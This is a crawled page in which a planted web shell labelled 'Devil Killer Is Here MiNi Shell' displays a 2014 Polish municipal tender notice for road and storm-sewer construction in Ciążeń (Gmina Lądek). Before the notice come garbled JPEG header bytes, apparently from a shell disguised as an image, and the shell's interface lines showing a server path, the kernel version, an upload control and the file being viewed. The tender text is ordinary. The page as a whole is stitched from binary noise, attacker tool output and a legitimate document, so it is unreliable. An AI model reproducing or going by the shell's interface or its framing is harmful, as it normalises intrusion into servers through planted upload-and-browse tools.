JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140909/298864-N-2014.html

<p class="kh_header"><b>Lądek: Budowa drogi gminnej wraz z kanalizacją deszczową na ul.Marii Konopnickiej
w Ciążeniu</b><br>
<b>Numer ogłoszenia: 298864 - 2014; data zamieszczenia: 09.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Lądek , ul. Rynek 26, 62-406 Lądek, woj. wielkopolskie, tel. 63 2763512, faks 63 2763512.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gmina-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi gminnej wraz z kanalizacją deszczową na ul.Marii Konopnickiej
w Ciążeniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa drogi gminnej wraz z kanalizacją deszczową na ul. Marii Konopnickiej w Ciążeniu.
I. Budowa  ul. M. Konopnickiej w Ciążeniu.
Kod PCV  :45233123 -7
1.Przebudowa  w pasie drogi powiatowej.
Roboty pomiarowe  przy robotach ziemnych , dla dróg  w terenie równinnym m -4,25; roboty ziemne wykonywane koparkami podsiębiernymi, poj.łyżki 0,60 m3, z transportem urobku samochodami samowył. 
Od 10-15 t na odległość do 3 km -7,92 m3; roboty ziemne wykonywane koparkami podsiębiernymi, poj.łyżki 0,60 m3, z transportem urobku samochodami samowyład.od  10-15 tona  na odległość do 0,5 km, w gruncie kat.I, II- 0,34 m3; ręczne formowanie nasypów z mechanicznym przemieszczeniem ziemi grunty kat. I, II - 0,34 m3;
Krawężniki , oporniki obrzeż.
Krawężniki betonowe wystające o wymiarach 15x30 cm , wraz wykonaniem ław betonowych, na podsypce cementowo-piaskowej - 5,00 m ;krawężniki betonowe SKOŚNE o wymiarach 15x22 cm, wraz z wykonaniem ław betonowych, na podsypce cementowo piaskowej- 8,00 m ; krawężniki betonowe ZJAZDOWE o wymiarach 15x22 cm, wraz z wykonaniem ław betonowych, na podsypce cementowo piaskowej - 2 m; oporniki (krawężniki)betonowe wtopione o wymiarach 12x25 cm, na  podsypce cementowo-piaskowej - 24,oo m ; 
Nawierzchnia jezdni
Profilowanie  i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywanie ręcznie w gruntach kategorii II do IV - 49,44 m2 ; stabilizacja podłoża  cementem RM = 2,5 Mpaz pospółki, grubość
warstwy po zagęszczeniu 10 cm - 49,44 m2 ;podbudowy betonowe , pielęgnacja podbudowy piaskiem i wodą , grubość warstwy po zagęszczeniu 15 cm - 49,44 m2 ; nawierzchnia z kostki brukowej  betonowej grubości 8 cm , szarej układane na podsypce cementowo piaskowej spoiny wypełniane piaskiem -49,44 m2
Chodniki
Profilowanie  i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywanie ręcznie w gruntach kategorii II do IV - 29,77 m2 ;
Oznakowanie pionowe
Słupki z rur stalowych o średnicy 50 mm - 2,00 szt, pionowe znaki drogowe , znaki zakazu, nakazu, ostrzegawcze  i informacyjne o powierzchni do 0,3 m2 - 2,00 szt ;
Roboty towarzyszące
Wykonanie przepustów pod drogami i innymi przeszkodami wykopem otwartym na gruncie kat 3. Rura dwudzielna Arot A11OPS - 17,00 m,
Roboty wykończeniowe
Plantowanie (obrobienie na czysto) skarp i dna wykopów wykonywanych ręcznie w gruncie kategorii I-III  12 m2; obsianie  skarp w ziemi uprawnej  -12 m2.
2.Przebudowa w pasie  drogi gminnej
Roboty przygotowawcze
Roboty pomiarowe  przy robotach ziemnych , dla dróg w terenie równinnym - 467,19 m ;mechaniczne karczowanie  krzaków i poszycia rzadkiego od 10-13 % powierzchni   - 25,00 m2 ; mechaniczne  ścinanie drzew o średnicy 16-25  cm z karczowaniem pni  - 4 szt ; mechaniczne ścinanie drzew o średnicy  10-15 cm, z karczowaniem pni  10,00 szt  ; wywożenie dłużyc -1 mp, transport na odległość do 2 km -1,50 mp;
wywożenie karpiny -1 mp , transport na odległość  wg Wykonawcy - 0,78 mp ;wywożenie gałęzi - 1 mp, transport na odległość wg Wykonawcy  - 1,28 mp; roboty ziemne  wykonywane  koparkami  podsiębiernymi poj.łyżki 0,60 m3  z transportem urobku samochodami samowyład. od  10-15 t na odległość do 3 km -992,94 m3  ;roboty ziemne  wykonywane  koparkami  podsiębiernymi poj.łyżki 0,60 m3  z transportem urobku samochodami samowyład. od  10-15 t na odległość do 0,5  km w gruncie kat I, II  - 98,06   m3  ;ręczne  formowanie nasypów  z mechanicznym przemieszczeniem ziemi grunty kategorii I ,II - 98,06 m3  ;
Krawężniki, oporniki, obrzeża
Krawężniki  betonowe wystające o wymiarach 15x30 cm , wraz  z wykonywaniem ław betonowych na podsypce  cementowo piaskowej  - 592,00 m ,krawężniki betonowe ZJAZDOWE o wymiarach  15x22 cm , wraz z wykonaniem ław betonowych , na podsypce cementowo piaskowej - 275,00 m ;  krawężniki betonowe SKOŚNE o wymiarach  15x22 cm , wraz z wykonaniem ław betonowych , na podsypce cementowo piaskowej - 73,00  m oporniki(krawężniki) betonowe , wtopione o wymiarach  12x25 cm , na podsypce cementowo-piaskowej  - 8,00  m; 
Nawierzchnia jezdni
Profilowanie i zagęszczanie  podłoża pod warstwy konstrukcyjne nawierzchni , wykonywanie ręcznie , w gruntach kategorii II do IV - 2812,41 m2 ; stabilizacja podłoża cementem do RM+ 2,5 Mpa z pospółki, grubość warstwy po zagęszczeniu 10 cm  - 2812,41 m2; podbudowy betonowe, pielęgnacja podbudowy piaskiem i wodą , grubość warstwy po zagęszczeniu 15 cm - 2812,41 m2; nawierzchnia z kostki brukowej betonowej grubość 8 cm, szarej, układane na posypce  cementowo piaskowej spoiny wypełniane piaskiem - 2 764,41 m2;nawierzchnia z kostki brukowej betonowej grubość 8 cm, kolorowej, układane na posypce  cementowo piaskowej spoiny wypełniane piaskiem - 24,00 m2; 
Zjazdy
 Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie w gruntach kategorii II do IV - 602,20 m2; 
Chodniki
Profilowanie i zagęszczanie podłoża po warstwy konstrukcyjne nawierzchni ,wykonywanie ręcznie , w gruntach kategorii II do IV - 1 242,18 m2; 
Oznakowanie pionowe
Słupki z rur stalowych  o średnicy 50 mm - 7,00 szt ; pionowe znaki drogowe, znaki zakazu, nakazu ostrzegawcze i  informacyjne o powierzchni do 0,3  m2  - 7 szt;
Roboty towarzyszące
Wykonanie przepustów pod drogami  i innymi przeszkodami wykopem otwartym na gruncie kategorii III  typu Arot A110PS  - 291,00 m ;regulacja pionowa studzienek dla urządzeń podziemnych, objętość betonu w jednym miejscu  do 0,1 m3 - 54,00 szt; wykopy liniowe szerokości 0,8 - 2,5 m głębokości do 1,5 m o ścianach pionowych z ręcznym wydobyciem urobku w gruntach suchych kategorii I,II - 15,00 m3; analiza własna - demontaż istniejącej odbudowy zasuwy, skrzynki ulicznej i rozłączenie przyłącza  - 10,00 kpl ; przyłącze wodociągowe  z rur stalowych ocynkowanych o średnicy rurociągu 25 mm - 1,50 m ;
analiza własna - montaż zasuwki odcinającej z obudową i skrzynką  uliczną - 10 ,00 kpl; zasypywanie  wykopów szerokości 0,8- 2,5 m , głębokości do 1,5 m, o ścianach pionowych , w gruntach kategorii I-III - 15,00 m3; przebudowa hydrantu nadziemnego na  podziemny ze skrzynka hydrantową - 2,00 m.
Roboty wykończeniowe 
Plantowanie (obrobienie na czysto) skarp i dna wykopów wykonywanych ręcznie , w gruncie kat I-III - 211,40 m2; obsianie skarp w ziemi urodzajnej  - 211,40 m2.

II. Budowa kanalizacji deszczowej na ul. Marii Konopnickiej w Ciążeniu
Kod PCV   - 45 000000 - 7
Roboty pomiarowe - trasa w terenie równinnym - km 0,455;  wykopy koparkami podsiębiernymi 0,60 m3 w gruncie kat 3 na odkład -   m3 920,000; wykop liniowy pionowy szer. 1,6 -2,5 m i głęb do 1,5 m w gruncie suchym kat 3-4  - m3  29,740 ;analogia  - umocnienie ścian wykopów liniowych wypraskami stalowymi z rozbiórką  w gruncie kat 3-4   - m2   250,000 ; podłoże pod kanały i obiekty z piasku grub 15 cm - m3  113,250 ; kanały z rur kanalizacyjnych PVC o 315 SN 8  łączone na wcisk w wykopie  skarpowym  metr  204,000; kanały z rur kanalizacyjnych PVC o 315 SN 12 łączone  na wcisk w wykopie skarpowym metr  250,700 ; 


kanały z rur kanalizacyjnych o 200 łączone na wcisk w wykopie skarpowym - metr 66,340;
studnia rewizyjna z kręgów betonowych o 1000 głębokości 3 m  - szt 12,000 ; studnia rewizyjna z kręgów betonowych o 1000 - różnica 0,5 m głębokości    szt - - 37,000; studzienka ściekowa uliczna betonowa  o  500 z osadnikiem bez syfonu   -szt 24,000 ;próba szczelności kanałów rurowych o 300 (długośc 50 m) szt 9 ; wycena własna - przegląd kamerą  - metr  m3    457,000; zasyp wykopów spycharkami 75 KM z przemieszczeniem do 10 m gruntu kat. 3  -  m3    836,000 ; zagęszczenie nasypów  zagęszczarkami grunt sypki kat 1-3 - m3    836,000; igłofiltry  wpłukiwane w grunt  bez osypki głęb. do 4 ,0 m - szt 50,000; pompowanie próbne pomiarowe lub oczyszczające m- godz  50,000; wycena własna  -wmurowanie przejścia szczelnego w istniejącą studnie -  szt 1,000.
Odtworzenie nawierzchni
Mechaniczne rozebranie nawierzchni bitumicznej grub.3 cm -   m2  50,00 ; mechaniczne rozebranie  nawierzchni bitumicznej - dodatek za 1 cm  - m2  50,00 ;ręczne profilowanie  i zagęszczenie podłoża kat.1/2 m2  50,00  ; warstwa dolna podbudowy z kruszywa łamanego grub. 15 cm - m2  50,00 ; warstwa górna podbudowy z kruszywa łamanego grub. 8  cm - m2  50,00 ;nawierzchnia asfaltowo -grysowa warstwa wiążąca grub 2 cm  - m2  50,00 ;nawierzchnia asfaltowo-grysowa warstwa wiążąca - dodatek za  1cm  (3 razy) - m2  50,00 ; nawierzchnia asfaltowo-grysowa warstwa ścieralna grub 2 cm - m2  50,00 ; nawierzchnia asfaltowo-grysowa warstwa ścieralna -dodatek za 1 cm (razy)3  - m2  50,00;
Przełożenie sieci wodociągowej
Wycena własna - wycięcie istniejącego wodociągu 6 x 5 m   - metr  30,000 ;rury ciśnieniowe z PE w wykopie skarpowymo 110 - metr  42,000 ;połączenie rur PE metoda zgrzewania czołowego w wykopie skarpowym o 110  - szt  24,000;montaż tuleji  kołnierzowych z PE o 110  zgrzewanych czołowo w wykopie skarpowym - szt 12; montaż kolana elektrooporowego PE w wykopie skarpowym o 110  - szt 12; wycena własna - montaż złącza R-K  - szt - 12.

    
 
Uwaga:
Jeżeli w opisie przedmiotu zamówienia lub dokumentacji projektowej  zostały wykonane znaki towarowe, patenty oraz pochodzenie urządzeń i materiałów  należy je traktować , jako propozycje projektanta..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.33.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie tego zamówienia  mogą ubiegać się  Wykonawcy spełniający warunki 
określone  w art. 22 ust.1 pkt. 1 ustawy Pzp ( prowadzenie działalności w zakresie objętym zamówieniem - budowa dróg , instalacje kanalizacyjne).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone w art. 22 ust.1 pkt.2 ustawy spełniający warunki udziału w postępowaniu tj: Wykonawca ubiehgający się o udzielenie zamówienia publicznego musi wykazać, że  w okresie ostatnich lat przed upływem terminu składania oferty , a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy roboty budowlane  odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia( 2 roboty budowlane w zakresie budowy dróg, 1 robota w zakresie kanalizacji deszczowej)  z podaniem jej wartości oraz daty i miejsca wykonania  oraz załączy dowody wydane przez  podmiot na rzecz którego
zostały wykonane , że roboty zostały wykonane w sposób należyty oraz wskazujący, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (wartość jednej roboty nie mniejsza niż 500 000,00 zł brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie, że dysponuje odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że w wykonaniu zamówienia uczestniczyć będzie:
-kierownik budowy posiadający uprawnienia do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie  sieci kanalizacyjnej bez ograniczeń zgodnie z obowiązującym polskim Prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państwa Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jednolity Dz.U z 2010 r Nr 43 poz. 1623 z późn. zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r. , nr 63 poz.394);
-kierownik robót drogowych posiadający uprawnienia do wykonywania samodzielnych funkcji w budownictwie bez ograniczeń do kierowania robotami budowlanymi w zakresie budowy  dróg, bądz też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej  obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz konfederacji Szwajcarskiej z zastrzeżeniem  art. 12 a oraz innych przepisów ustawy Prawo Budowlane (tekst jednolity Dz.U z 2010 r nr 43 poz. 1623 z późn. zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r Nr 63 poz.394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie  środków finansowych lub zdolność kredytową w wysokości co najmniej 800 000,00 zł (słownei:osiemsettysięcy i 0/100 zł);
posiadanie polisy  ubezpieczeniowej a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 500 000,00 zł(słownie:pięćsettysięcy i o/100 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmiany umowy w stosunku do treści oferty Wykonawcy w następujących okolicznościach:
1)Zmiany osoby kierownika budowy i kierownika robót pod warunkiem, że nowa osoba posiada takie same uprawnienia i spełnia wymogi SIWZ; 
2)Zmiany terminu realizacji przedmiotu umowy spowodowane:
a)koniecznością wykonania zamówień dodatkowych, albo wykonania części robót inną technologią niż założona w dokumentacji,
b)zaistnieniem sytuacji skutkującej, że rozpoczęcie robót jest niemożliwe z przyczyn leżących po stronie Zamawiającego do czasu niezbędnego do usunięcia 
przyczyn niemożności rozpoczęcia prac,
c)siłą wyższą lub klęską żywiołową uniemożliwiającą wykonanie przedmiotu umowy zgodnie z umową,
d)warunkami pogodowymi uniemożliwiającymi prowadzenie robót jeżeli odbiegają od  normalnych zjawisk pogodowych (długotrwałe opady atmosferyczne)
e)niemożliwymi wcześniej do przewidzenia brakami w dokumentacji i koniecznością jej uzupełnienia albo wprowadzenia do niej zmian o czas niezbędny  na przeprojektowanie dokumentacji,
f)przerwaniem prac przez właściwe organy administracji rządowej i samorządowej  
albo  wykonanie prawomocnego orzeczenia sądu, za co nie można przypisać 
 winy Wykonawcy,
g)koniecznością usunięcia  niewypałów i niewybuchów o czas niezbędny do usunięcia przyczyn wstrzymania prac,
h)koniecznością usunięcia wykopalisk archeologicznych do czasu niezbędnego do usunięcia przyczyn wstrzymania prac, 
